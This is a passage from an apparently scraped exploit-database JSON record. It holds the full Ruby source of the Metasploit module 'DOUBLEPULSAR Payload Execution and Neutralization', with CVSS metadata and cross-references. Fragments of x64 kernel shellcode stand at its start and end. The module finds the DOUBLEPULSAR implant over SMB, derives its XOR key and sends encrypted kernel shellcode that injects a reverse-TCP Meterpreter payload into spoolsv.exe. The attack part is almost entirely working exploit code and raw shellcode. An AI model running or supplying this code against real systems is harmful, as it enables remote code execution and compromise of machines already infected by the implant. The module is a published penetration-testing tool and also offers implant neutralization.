\"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-09] #"}, "lastseen": "2021-10-08T22:18:55", "differentElements": ["sourceData"], "edition": 39}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "fe27bd38f18a25429831e49bd989ffaa", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-09T22:23:13", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-08T00:17:28", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-08T00:17:28", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n 